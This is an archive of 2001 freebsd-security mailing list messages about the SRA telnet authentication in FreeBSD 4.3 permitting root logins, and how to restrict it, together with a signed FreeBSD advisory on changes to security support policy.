Date: Tue, 8 May 2001 13:46:13 +0800
X-Mailer: Microsoft Outlook Express 5.00.2615.200
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

I have the same question as you asked. Expect an answer too. ;)

----- Original Message -----
From: jlschwab <jlschwab@simphost.com>
To: <freebsd-questions@freebsd.org>; <freebsd-security@freebsd.org>
Sent: Tuesday, May 08, 2001 12:35 AM
Subject: SRA..


> Heya Guys and Gals;
>
> Trying any.of.my.machines.ips...
> Connected to X.X.X.X.
> Escape character is '^]'.
> Trying SRA secure login:
> User (root): Password:
>
> what is SRA, secure telnet login?
> and how can I disable this?
>
> I also noticed it only works from freebsd -> freebsd boxes
>
> thanks.
>

From owner-freebsd-security  Fri May 11  2:46:24 2001
Delivered-To: freebsd-security@freebsd.org
Received: from www.suntop-cn.com (www.suntop-cn.com [61.140.76.155])
        by hub.freebsd.org (Postfix) with ESMTP id BE8C837B424
        for ; Fri, 11 May 2001 02:46:16 -0700 (PDT)
        (envelope-from huacheng@public.guangzhou.gd.cn)
Received: from gate.suntop.com ([61.140.208.60]) by www.suntop-cn.com (8.11.3/8.11.3)
        with ESMTP id f4B1oix27236 for ; Fri, 11 May 2001 09:50:44 +0800 (CST)
        (envelope-from huacheng@public.guangzhou.gd.cn)
Received: from rep1 (rep1.suntop.com [192.168.1.88]) by gate.suntop.com (8.11.3/8.11.3)
        with SMTP id f4B1oc825190 for ; Fri, 11 May 2001 09:50:39 +0800 (CST)
        (envelope-from huacheng@public.guangzhou.gd.cn)
Message-ID: <001b01c0d9bc$c7e00400$5801a8c0@suntop.com>
From: "edwin chan"
To:
References: <3AFB369D.5574182A@enter.net>
Subject: Re: FreeBSD 4.3 RELEASE and -STABLE allows telnet root logins?
Date: Fri, 11 May 2001 09:50:38 +0800
X-Mailer: Microsoft Outlook Express 5.00.2615.200
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

I have the same question, I searched many documents but can't find an answer either.
hope someone can help us.

edwin chan


----- Original Message -----
From: Daniel Hauer <dh@enter.net>
To: <freebsd-security@freebsd.org>
Sent: Friday, May 11, 2001 8:47 AM
Subject: FreeBSD 4.3 RELEASE and -STABLE allows telnet root logins?


> Hello all,
>   After installing 4.3 release on one machine and upgrading 2 other
> machines to -STABLE, I noticed there is a new mechanism used in telnetd,
> namely this "SRA" authentication mechanism. While convenient, (you
> don't have to type your username) I found something VERY disturbing: If
> you are at a root prompt on any other BSD
> based machine, you can just telnet to the 4.3 machines, and login right
> in with the root username and password! This only apparently occurs from
> a BSD based machine, as Myself and a co-worker tried it from 2 different
> distribution Linux boxes, and we could not login as root. None of the
> switches for telnetd in the inetd.conf worked to our satisfaction, and
> after reading the sources, we recompiled telnetd with AUTHENTICATION=NO
> to disable this behavior. What is this "SRA authentication" ? And why is
> telnetd's default behavior to allow root logins at all? I realize that
> any self respecting sysadmin will either use ipfirewall, ipfilter, or
> good old inetd's hosts.allow file to limit telnet logins anyway, but the
> question still remains.... Why? Wouldn't this SRA with a "no root" login
> be a better idea?
>
> --
> Regards,
> Daniel Hauer
> Network Administration
> http://www.enter.net  "The Road To The Internet Starts There!"
> *****************************************************************************
> Windoze is for GAMES, UNIX is for the rest of us.
> UNIX is like the sights on a loaded gun. If you aim the gun
> at your foot and pull the trigger, it is the basic function of
> UNIX to accurately deliver the bullet from the gun to the
> target. In this case, it's your foot.
> *****************************************************************************
>

From owner-freebsd-security  Fri May 11  2:57:58 2001
Delivered-To: freebsd-security@freebsd.org
Received: from silby.com (adam042-060.resnet.wisc.edu [146.151.42.60])
        by hub.freebsd.org (Postfix) with ESMTP id 6500C37B423
        for ; Fri, 11 May 2001 02:57:55 -0700 (PDT)
        (envelope-from silby@silby.com)
Received: (qmail 46327 invoked by uid 1000); 11 May 2001 09:57:48 -0000
Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP;
        11 May 2001 09:57:48 -0000
Date: Fri, 11 May 2001 04:57:48 -0500 (CDT)
From: Mike Silbersack
To: edwin chan
Cc:
Subject: Re: FreeBSD 4.3 RELEASE and -STABLE allows telnet root logins?
In-Reply-To: <001b01c0d9bc$c7e00400$5801a8c0@suntop.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Fri, 11 May 2001, edwin chan wrote:

> I have the same question, I searched many documents but can't find an answer either.
> hope someone can help us.
>
> edwin chan

http://www-cs-students.stanford.edu/~tjw/srp/

Note that in asking this five times, you reached your question quota for
the next two weeks.  Please wait that long before asking any more
questions on this list.

Thanks,

Mike "Silby" Silbersack

From owner-freebsd-security  Fri May 11  3:21: 4 2001
Delivered-To: freebsd-security@freebsd.org
Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21])
        by hub.freebsd.org (Postfix) with ESMTP id 583C437B422;
        Fri, 11 May 2001 03:20:53 -0700 (PDT)
        (envelope-from security-advisories@FreeBSD.org)
Received: (from kris@localhost) by freefall.freebsd.org (8.11.1/8.11.1)
        id f4BAKrL63777; Fri, 11 May 2001 03:20:53 -0700 (PDT)
        (envelope-from security-advisories@FreeBSD.org)
Date: Fri, 11 May 2001 03:20:53 -0700 (PDT)
Message-Id: <200105111020.f4BAKrL63777@freefall.freebsd.org>
X-Authentication-Warning: freefall.freebsd.org: kris set sender to security-advisories@FreeBSD.org using -f
From: FreeBSD Security Advisories
To: FreeBSD Security Advisories
Subject: Changes to FreeBSD security support policy
Reply-To: security-advisories@FreeBSD.org
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

-----BEGIN PGP SIGNED MESSAGE-----

This announcement describes a change in the security support status of
the FreeBSD 3.x branch, as well as the introduction of two new methods
for tracking security fixes to FreeBSD 4.3-RELEASE: a FreeBSD CVS branch
based on 4.3-RELEASE which will contain security fixes only, and the
intention to trial binary security update packages for users of FreeBSD
4.3-RELEASE on the i386 platform.

1) CHANGE IN SUPPORT FOR THE FREEBSD 3.x BRANCH
   --------------------------------------------

As of this point, the Security Officer Team will provide full
vulnerability response (assessment, correction, notification) for the
FreeBSD 4.x branch only; the FreeBSD 3.x branch will continue to see
vulnerability response only for remotely exploitable vulnerabilities.
This eliminates support for the class of vulnerabilities exploitable by
users with accounts on the system.

This is necessary due to substantial divergence of the supported 4.x
branch from the 3.x branch, and the increasing age of userland library
infrastructure in the 3.x branch.  Details on unresolved vulnerabilities
in the 3.x branch may be found later in this document.

FreeBSD Branch Support Status
- -----------------------------

Branch/Release      Support Status
- --------------      --------------
3.5.1-RELEASE  |
3.5-STABLE     | Support for remotely exploitable vulnerabilities.

4.3-STABLE     | Support for all local and remote security
4.2-RELEASE    | vulnerabilities.
4.3-RELEASE    |

5.0-CURRENT    | This development branch is not yet supported by
               | the Security Officer Team

Recommendation to Users of the FreeBSD 3.x Branch
- -------------------------------------------------

The FreeBSD Security Officer recommends that all systems currently
running a version of FreeBSD 3.x be upgraded to 4.3-RELEASE or higher.
Use of FreeBSD 3.5.1-RELEASE or FreeBSD 3.5-STABLE as a sealed-box
network appliance without untrusted local user access will continue to
be supported until at least the release of FreeBSD 5.0-RELEASE.

This change in policy will allow the Security Officer Team to devote
greater energy to addressing in a timely manner any security issues that
may evolve on the 4.x branch, as well as to provide more support to the
FreeBSD developer community to improve development practices.

Outstanding Local Vulnerabilities in the 3.x Branch
- ---------------------------------------------------

Currently, FreeBSD Security Advisory SA-00:68, ``ncurses allows local
privilege escalation,'' is unresolved in the 3.x branch, as noted in that
advisory at time of release.  Upgrading the necessary libraries in the
3.x branch would require introducing binary incompatibilities in
3.5.1-RELEASE systems comparable to an upgrade to the 4.x branch.
Such disruption is against the policy of FreeBSD regarding ``-STABLE''
branches, and would cause significant disruption to users of that branch
for whom local security vulnerabilities may not be of concern.  As the
code in question is more than 5 years old, and substantially different
from the corresponding code in the 4.x branch, developing an equivalent
fix has proven very difficult.

It may be feasible for individual installations to manually upgrade
their ncurses libraries to a non-vulnerable version, but this is not a
strategy supported by the FreeBSD Security Officer.  As an interim
strategy prior to upgrading to FreeBSD 4.3-RELEASE or later, see the
workarounds contained in the advisory referenced above.

2) INTRODUCTION OF THE RELENG_4_3 SECURITY BRANCH
   ----------------------------------------------

As of FreeBSD 4.3-RELEASE, the security officer will be providing
support for a new CVS branch consisting of 4.3-RELEASE plus all released
security patches from FreeBSD Security Advisories.  This branch carries
the CVS branch tag of ``RELENG_4_3'', and can be tracked using the usual
source distribution methods such as cvsup using this branch tag.

In contrast to 4.3-STABLE (``RELENG_4''), which carries security updates
as well as general bugfixes and feature enhancements, the RELENG_4_3
release branch will carry ONLY security fixes: it is intended for users
of FreeBSD who do not wish to track the full 4.3-STABLE branch but who
wish to keep their system up-to-date with security fixes in a
semi-automated manner (i.e. without applying patches by hand).

This practise of using a release branch to hold security fixes is likely
to be continued for future releases of FreeBSD.

3) PROVISION OF BINARY UPDATE PACKAGES FOR SECURITY FIXES
   ------------------------------------------------------

In response to many user requests, the Security Officer Team will trial
the production of binary packages for correcting security
vulnerabilities in the FreeBSD base system.

At this stage only support for userland (as opposed to kernel)
vulnerabilities is planned due to the difficulty of providing a single
update for locally-customized kernel versions, although we may be able
to provide an updated version of the GENERIC kernel for users who wish
to use it to avoid patching and recompiling their own GENERIC kernel
from source.

The correct operation of binary patches relies heavily on a known common
base to which the update is applied.  Therefore binary patches will only
be supported for users of FreeBSD 4.3-RELEASE on the i386.  Users of
older supported releases of FreeBSD, users of FreeBSD 4.3-STABLE, or
users who choose to follow the RELENG_4_3 branch (described above) are
expected to use traditional methods of applying security fixes to their
FreeBSD installations, such as applying patches by hand, or using cvsup
to update the source collection.

For questions regarding the matters discussed in this announcement,
please contact the FreeBSD Security Officer .

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.5 (FreeBSD)
Comment: For info see http://www.gnupg.org

iQCVAwUBOvu8S1UuHi5z0oilAQFvvgQAggyNd7n/f7QHnIt8/lW4GSN4bKuVnH9L
GrwZ55bg0SOaTO6NEFu6Yapd5+Rd+5mAl3qN1hhzLrwbdizA7z3W8DSBiDTEViZM
nUKZ1JZOkbEuqf0nEfeLXBvvkRFMywQwsdjjb8vJiM+d13iyW1I8+FPMRz0BnuJX
piMSK1g/KkU=
=K33O
-----END PGP SIGNATURE-----

From owner-freebsd-security  Fri May 11  3:24:18 2001
Delivered-To: freebsd-security@freebsd.org
Received: from public.guangzhou.gd.cn (mail2-smtp.guangzhou.gd.cn [202.105.65.222])
        by hub.freebsd.org (Postfix) with SMTP id 8EB2E37B43C
        for ; Fri, 11 May 2001 03:24:13 -0700 (PDT)
        (envelope-from huacheng@public.guangzhou.gd.cn)
Received: from rep1([61.140.208.60]) by public.guangzhou.gd.cn(JetMail 2.5.3.0)
        with SMTP id jm23afbcba9; Fri, 11 May 2001 10:22:36 -0000
Message-ID: <011201c0da04$823660a0$5801a8c0@suntop.com>
From: "edwin chan"
To: "Mike Silbersack"
Cc:
References:
Subject: Re: FreeBSD 4.3 RELEASE and -STABLE allows telnet root logins?
Date: Fri, 11 May 2001 18:24:04 +0800
X-Mailer: Microsoft Outlook Express 5.00.2615.200
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

sorry, because I was not sure if the mail was sent out or received
correctly, I used our new e-mail server to send mail to this newsgroup,
but received a warning that our mail server does not have a PTR. It's
very difficult to get a PTR in China. sorry.


----- Original Message -----
From: Mike Silbersack <silby@silby.com>
To: edwin chan <huacheng@public.guangzhou.gd.cn>
Cc: <freebsd-security@FreeBSD.org>
Sent: Friday, May 11, 2001 5:57 PM
Subject: Re: FreeBSD 4.3 RELEASE and -STABLE allows telnet root logins?


>
> On Fri, 11 May 2001, edwin chan wrote:
>
> > I have the same question, I searched many documents but can't find an answer either.
> > hope someone can help us.
> >
> > edwin chan
>
> http://www-cs-students.stanford.edu/~tjw/srp/
>
> Note that in asking this five times, you reached your question quota for
> the next two weeks.  Please wait that long before asking any more
> questions on this list.
>
> Thanks,
>
> Mike "Silby" Silbersack
>
From owner-freebsd-security Fri May 11 3:42:35 2001 Delivered-To: freebsd-security@freebsd.org Received: from eve.framatome.fr (eve.framatome.fr [195.101.50.66]) by hub.freebsd.org (Postfix) with ESMTP id B8E4D37B424 for ; Fri, 11 May 2001 03:42:31 -0700 (PDT) (envelope-from ubc@paris.framatome.fr) Received: from localhost (ubc@localhost) by eve.framatome.fr (8.11.2/8.11.2) with ESMTP id f4BAfB315149; Fri, 11 May 2001 12:41:11 +0200 (CEST) (envelope-from ubc@eve.framatome.fr) Date: Fri, 11 May 2001 12:41:11 +0200 (CEST) From: Claude Buisson To: Mike Silbersack Cc: edwin chan , Subject: Re: FreeBSD 4.3 RELEASE and -STABLE allows telnet root logins? In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, 11 May 2001, Mike Silbersack wrote: > > On Fri, 11 May 2001, edwin chan wrote: > > > I have the same question, I searched many documents but can't found a answer too. > > hope someone can help us. 
> > > > edwin chan > > http://www-cs-students.stanford.edu/~tjw/srp/ > I don't think so, see: http://www.freebsd.org/cgi/cvsweb.cgi/src/crypto/telnet/libtelnet/sra.c and ftp://net.tamu.edu/pub/security/TAMU/sra.ps.gz Claude Buisson To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 11 4:58: 7 2001 Delivered-To: freebsd-security@freebsd.org Received: from smtp1.sentex.ca (smtp1.sentex.ca [199.212.134.4]) by hub.freebsd.org (Postfix) with ESMTP id 00F9037B422 for ; Fri, 11 May 2001 04:58:01 -0700 (PDT) (envelope-from mike@sentex.net) Received: from chimp (cage.simianscience.com [64.7.134.1]) by smtp1.sentex.ca (8.11.2/8.11.1) with ESMTP id f4BBvoV39938; Fri, 11 May 2001 07:57:51 -0400 (EDT) (envelope-from mike@sentex.net) Message-Id: <4.2.2.20010511075525.05d665b0@192.168.0.12> X-Sender: mdtancsa@192.168.0.12 X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.2 Date: Fri, 11 May 2001 07:57:49 -0400 To: Jussi Jaurola From: Mike Tancsa Subject: Re: preventing direct root login on telnetd Cc: security@FreeBSD.ORG In-Reply-To: References: <4.2.2.20010511000303.036916f8@192.168.0.12> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 08:57 AM 5/11/2001 +0300, Jussi Jaurola wrote: >Use /etc/hosts.allow. But I think that telnet protocol is so crappy that >use ssh instead? The machine is for customer access. I cannot force them to use ssh all the time so must keep telnet open as an option. How can you use /etc/hosts.allow which wraps the service to prevent it from being used from a certain IP/host/network. I dont see how you can use it to prevent a certain user. 
---Mike -------------------------------------------------------------------- Mike Tancsa, tel +1 519 651 3400 Network Administration, mike@sentex.net Sentex Communications www.sentex.net Cambridge, Ontario Canada www.sentex.net/mike To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 11 5: 0: 4 2001 Delivered-To: freebsd-security@freebsd.org Received: from smtp1.sentex.ca (smtp1.sentex.ca [199.212.134.4]) by hub.freebsd.org (Postfix) with ESMTP id 0A74F37B43E for ; Fri, 11 May 2001 05:00:00 -0700 (PDT) (envelope-from mike@sentex.net) Received: from chimp (cage.simianscience.com [64.7.134.1]) by smtp1.sentex.ca (8.11.2/8.11.1) with ESMTP id f4BBxuV40126; Fri, 11 May 2001 07:59:57 -0400 (EDT) (envelope-from mike@sentex.net) Message-Id: <4.2.2.20010511075808.023ee200@192.168.0.12> X-Sender: mdtancsa@192.168.0.12 X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.2 Date: Fri, 11 May 2001 07:59:55 -0400 To: Gabor Zahemszky , freebsd-security@freebsd.org From: Mike Tancsa Subject: Re: preventing direct root login on telnetd In-Reply-To: <20010511071947.C264@zg.CoDe.hu> References: <4.2.2.20010511000303.036916f8@192.168.0.12> <4.2.2.20010511000303.036916f8@192.168.0.12> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 07:19 AM 5/11/2001 +0000, Gabor Zahemszky wrote: >On Fri, May 11, 2001 at 12:09:09AM -0400, Mike Tancsa wrote: > > > > Is there a way to prevent root from logging in directly on STABLE via > telnet ? > >Direct root logins are enabled/disabled via /etc/ttys, aren't it? The new telnetd seems to blow by that. >Or maybe via the /etc/login.access file. man login.access >Btw. Don't use telnet, and never login as root. Use `su' instead. Yes, I dont ever use it but customers do to this particular machine. I will take a look at login.access. 
Do you know if it works, or if telnetd now ignores that as well ? -------------------------------------------------------------------- Mike Tancsa, tel +1 519 651 3400 Network Administration, mike@sentex.net Sentex Communications www.sentex.net Cambridge, Ontario Canada www.sentex.net/mike To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 11 5: 1:23 2001 Delivered-To: freebsd-security@freebsd.org Received: from gobbe.net (gobbe.net [212.83.113.102]) by hub.freebsd.org (Postfix) with ESMTP id BE05537B423 for ; Fri, 11 May 2001 05:01:20 -0700 (PDT) (envelope-from gobbe@gobbe.net) Received: from localhost (gobbe@localhost) by gobbe.net (8.9.3/8.9.3) with ESMTP id OAA30917; Fri, 11 May 2001 14:58:02 +0300 (EEST) (envelope-from gobbe@gobbe.net) Date: Fri, 11 May 2001 14:58:01 +0300 (EEST) From: Jussi Jaurola To: Mike Tancsa Cc: security@FreeBSD.ORG Subject: Re: preventing direct root login on telnetd In-Reply-To: <4.2.2.20010511075525.05d665b0@192.168.0.12> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Sorry, I was wrong. /etc/login.access is the right file, use that (man login.access can help you a little bit). -- Jussi P. Jaurola Network Security Engineer gobbe@gobbe.net Netello Systems, Ltd. http://gobbe.net +358 50 566 9183 On Fri, 11 May 2001, Mike Tancsa wrote: > At 08:57 AM 5/11/2001 +0300, Jussi Jaurola wrote: > >Use /etc/hosts.allow. But I think that telnet protocol is so crappy that > >use ssh instead? > > > The machine is for customer access. I cannot force them to use ssh all the > time so must keep telnet open as an option. How can you use > /etc/hosts.allow which wraps the service to prevent it from being used from > a certain IP/host/network. I dont see how you can use it to prevent a > certain user.
> > ---Mike > -------------------------------------------------------------------- > Mike Tancsa, tel +1 519 651 3400 > Network Administration, mike@sentex.net > Sentex Communications www.sentex.net > Cambridge, Ontario Canada www.sentex.net/mike > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 11 7:43:53 2001 Delivered-To: freebsd-security@freebsd.org Received: from fledge.watson.org (fledge.watson.org [204.156.12.50]) by hub.freebsd.org (Postfix) with ESMTP id 7096437B43E for ; Fri, 11 May 2001 07:43:46 -0700 (PDT) (envelope-from robert@fledge.watson.org) Received: from fledge.watson.org (robert@fledge.pr.watson.org [192.0.2.3]) by fledge.watson.org (8.11.3/8.11.3) with SMTP id f4BEhbf23811; Fri, 11 May 2001 10:43:37 -0400 (EDT) (envelope-from robert@fledge.watson.org) Date: Fri, 11 May 2001 10:43:36 -0400 (EDT) From: Robert Watson X-Sender: robert@fledge.watson.org To: Daniel Hauer Cc: freebsd-security@freebsd.org Subject: Re: FreeBSD 4.3 RELEASE and -STABLE allows telnet root logins? In-Reply-To: <3AFB369D.5574182A@enter.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org This is a known problem and we are working to resolve this ASAP. Robert N M Watson FreeBSD Core Team, TrustedBSD Project robert@fledge.watson.org NAI Labs, Safeport Network Services On Thu, 10 May 2001, Daniel Hauer wrote: > Hello all, > After installing 4.3 release on one machine and upgrading 2 other > machines to -STABLE, I noticed there is a new mechanism used in telnetd, > namely this "SRA" authentication mechanism. 
While convenient (you > don't have to type your username) I found something VERY disturbing: If > you are at a root prompt on any other BSD > based machine, you can just telnet to the 4.3 machines, and login right > in with the root username and password! This only apparently occurs from > a BSD based machine, as a co-worker and I tried it from 2 different > distribution Linux boxes, and we could not login as root. None of the > switches for telnetd in the inetd.conf worked to our satisfaction, and > after reading the sources, we recompiled telnetd with AUTHENTICATION=NO > to disable this behavior. What is this "SRA authentication" ? And why is > telnetd's default behavior to allow root logins at all? I realize that > any self-respecting sysadmin will either use ipfirewall, ipfilter, or > good old inetd's hosts.allow file to limit telnet logins anyway, but the > question still remains.... Why? Wouldn't this SRA with a "no root" login > be a better idea? > > -- > Regards, > Daniel Hauer > Network Administration > http://www.enter.net "The Road To The Internet Starts There!" > *************************************************************************** > Windoze is for GAMES, UNIX is for the rest of us. > UNIX is like the sights on a loaded gun. If you aim the gun > at your foot and pull the trigger, it is the basic function of > UNIX to accurately deliver the bullet from the gun to the > target. In this case, it's your foot.
> *************************************************************************** > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 11 7:59:38 2001 Delivered-To: freebsd-security@freebsd.org Received: from silby.com (adam042-060.resnet.wisc.edu [146.151.42.60]) by hub.freebsd.org (Postfix) with ESMTP id 72F0A37B423 for ; Fri, 11 May 2001 07:59:34 -0700 (PDT) (envelope-from silby@silby.com) Received: (qmail 46701 invoked by uid 1000); 11 May 2001 14:59:32 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 11 May 2001 14:59:32 -0000 Date: Fri, 11 May 2001 09:59:32 -0500 (CDT) From: Mike Silbersack To: Claude Buisson Cc: edwin chan , Subject: Re: FreeBSD 4.3 RELEASE and -STABLE allows telnet root logins? In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, 11 May 2001, Claude Buisson wrote: > On Fri, 11 May 2001, Mike Silbersack wrote: > > > http://www-cs-students.stanford.edu/~tjw/srp/ > > I don't think so, see: > > http://www.freebsd.org/cgi/cvsweb.cgi/src/crypto/telnet/libtelnet/sra.c > > and > > ftp://net.tamu.edu/pub/security/TAMU/sra.ps.gz > > > Claude Buisson Urk, thanks for the pointer. My mind jumped to the nearest acronym it could think of, rather than reading the one presented to me. 
Mike "Silby" Silbersack To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 11 8:29: 3 2001 Delivered-To: freebsd-security@freebsd.org Received: from mdma.playboy.com (mdma.playboy.com [216.163.140.20]) by hub.freebsd.org (Postfix) with ESMTP id B076D37B424 for ; Fri, 11 May 2001 08:29:00 -0700 (PDT) (envelope-from jamie@playboy.com) Received: by mdma.playboy.com (Postfix, from userid 100) id F093F12796; Fri, 11 May 2001 10:28:49 -0500 (CDT) Date: Fri, 11 May 2001 10:28:49 -0500 From: jamie rishaw To: edwin chan Cc: freebsd-security@freebsd.org Subject: Re: I expect a answer about SRA Message-ID: <20010511102849.A9587@playboy.com> References: <004b01c0d9e4$a3bb35e0$5801a8c0@suntop.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <004b01c0d9e4$a3bb35e0$5801a8c0@suntop.com>; from huacheng@public.guangzhou.gd.cn on Fri, May 11, 2001 at 02:35:58PM +0800 X-No-Archive: yes Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org If you "Expect", then you best be buying commercial support. This list is not for one to make demands .. On Fri, May 11, 2001 at 02:35:58PM +0800, edwin chan wrote: > I expect a answer about SRA too. -- jamie rishaw sr. wan/unix engineer/ninja // playboy enterprises inc. opinions stated are mine, and are not necessarily those of the bunny. 
To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 11 8:36: 8 2001 Delivered-To: freebsd-security@freebsd.org Received: from mohegan.mohawk.net (mohegan.mohawk.net [63.66.68.21]) by hub.freebsd.org (Postfix) with ESMTP id F2DAF37B61A for ; Fri, 11 May 2001 08:36:02 -0700 (PDT) (envelope-from rjh@mohawk.net) Received: from mohegan.mohawk.net (mohegan.mohawk.net [63.66.68.21]) by mohegan.mohawk.net (8.11.3/8.11.3) with ESMTP id f4BFa0L15527; Fri, 11 May 2001 11:36:00 -0400 (EDT) Date: Fri, 11 May 2001 11:36:00 -0400 (EDT) From: Ralph Huntington To: jamie rishaw Cc: edwin chan , freebsd-security@FreeBSD.ORG Subject: Re: I expect a answer about SRA In-Reply-To: <20010511102849.A9587@playboy.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I suspect that our friend from China is more vocabulary limited than he is demanding. My guess is that he meant something like "am hoping for" and "expect" was the closest he could come to it. I could be wrong, but that's my guess. -=r=- On Fri, 11 May 2001, jamie rishaw wrote: > If you "Expect", then you best be buying commercial support. > > This list is not for one to make demands .. > > On Fri, May 11, 2001 at 02:35:58PM +0800, edwin chan wrote: > > I expect a answer about SRA too. > > -- > jamie rishaw > sr. wan/unix engineer/ninja // playboy enterprises inc. > opinions stated are mine, and are not necessarily those of the bunny. 
> > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 11 8:55:55 2001 Delivered-To: freebsd-security@freebsd.org Received: from sentry.granch.com (sentry.granch.com [212.109.197.55]) by hub.freebsd.org (Postfix) with ESMTP id 145AA37B423 for ; Fri, 11 May 2001 08:55:51 -0700 (PDT) (envelope-from shelton@sentry.granch.ru) Received: from sentry.granch.com (localhost [127.0.0.1]) by sentry.granch.com (8.11.3/8.11.3) with SMTP id f4BFtHD11430; Fri, 11 May 2001 22:55:21 +0700 (NOVST) (envelope-from shelton@sentry.granch.ru) Content-Type: text/plain; charset="koi8-r" From: "Rashid N. Achilov" Reply-To: achilov@granch.ru Organization: Granch Ltd. To: Mike Silbersack , edwin chan Subject: Re: FreeBSD 4.3 RELEASE and -STABLE allows telnet root logins? Date: Fri, 11 May 2001 22:55:17 +0700 X-Mailer: KMail [version 1.2] Cc: References: In-Reply-To: MIME-Version: 1.0 Message-Id: <0105112255170C.06061@sentry.granch.com> Content-Transfer-Encoding: 8bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Friday 11 May 2001 16:57, Mike Silbersack wrote: > On Fri, 11 May 2001, edwin chan wrote: > > I have the same question, I searched many documents but can't found a > > answer too. hope someone can help us. > > > > edwin chan > > http://www-cs-students.stanford.edu/~tjw/srp/ > I have just read this. They asserted that the SRA mechanism is better than SSH? Is that ok, do you think? (I wouldn't have noticed this news if I hadn't read freebsd-security - I have had telnet disabled for ages :-) ) -- With Best Regards. Rashid N. Achilov (RNA1-RIPE), Web: http://granch.ru/~shelton Granch Ltd.
system administrator, e-mail: achilov@granch.ru PGP: 83 CD E2 A7 37 4A D5 81 D6 D6 52 BF C9 2F 85 AF 97 BE CB 0A To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 11 9:13: 3 2001 Delivered-To: freebsd-security@freebsd.org Received: from public.guangzhou.gd.cn (mail1-smtp.guangzhou.gd.cn [202.105.65.221]) by hub.freebsd.org (Postfix) with SMTP id 425BB37B423 for ; Fri, 11 May 2001 09:12:44 -0700 (PDT) (envelope-from huacheng@public.guangzhou.gd.cn) Received: from slack([61.140.83.14]) by public.guangzhou.gd.cn(JetMail 2.5.3.0) with SMTP id jm1a3afc0f3a; Fri, 11 May 2001 16:11:11 -0000 Message-ID: <007401c0da35$3b1dbb60$9201a8c0@home.net> From: "edwin chan" To: "Ralph Huntington" , "jamie rishaw" Cc: References: Subject: Re: I expect a answer about SRA Date: Sat, 12 May 2001 00:12:46 +0800 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.2615.200 X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2615.200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Yes, I am more vocabulary-limited than demanding, more limited than you think. I have a Chinese-English online dictionary on my computer, ready to translate Chinese words to English when I write/read mail. LOL. Now I know something about SRA, thanks everybody. edwin chan ----- Original Message ----- From: Ralph Huntington To: jamie rishaw Cc: edwin chan ; Sent: Friday, May 11, 2001 11:36 PM Subject: Re: I expect a answer about SRA > I suspect that our friend from China is more vocabulary limited than he is > demanding. My guess is that he meant something like "am hoping for" and > "expect" was the closest he could come to it. I could be wrong, but that's > my guess.
